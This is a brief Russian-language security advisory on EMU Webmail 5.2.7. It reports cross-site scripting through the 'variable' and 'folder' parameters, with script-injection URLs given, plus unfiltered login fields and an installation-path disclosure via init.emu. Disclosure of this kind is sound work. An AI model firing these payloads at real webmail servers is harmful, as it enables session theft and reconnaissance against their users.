Программа: EMU Webmail 5.2.7
Несколько уязвимостей обнаружено в EMU Webmail. Удаленный пользователь может определить инсталляционный путь. Удаленный пользователь может выполнить XSS нападение.
1. XSS:
http://[target]:1010/webmail/emumail.fcgi?passed= parse&variable=%3Cscript%3Ealert(
%22G%22)%3C/ script%3E
http://[target]:1010/webmail/emumail.fcgi?passed= go_index&folder=<script>alert("G")</script>
Также не фильтруются поля имени пользователя и пароля в странице входа в систему.
2. Раскрытие пути:
http://[target]:1010/webmail/init.emu
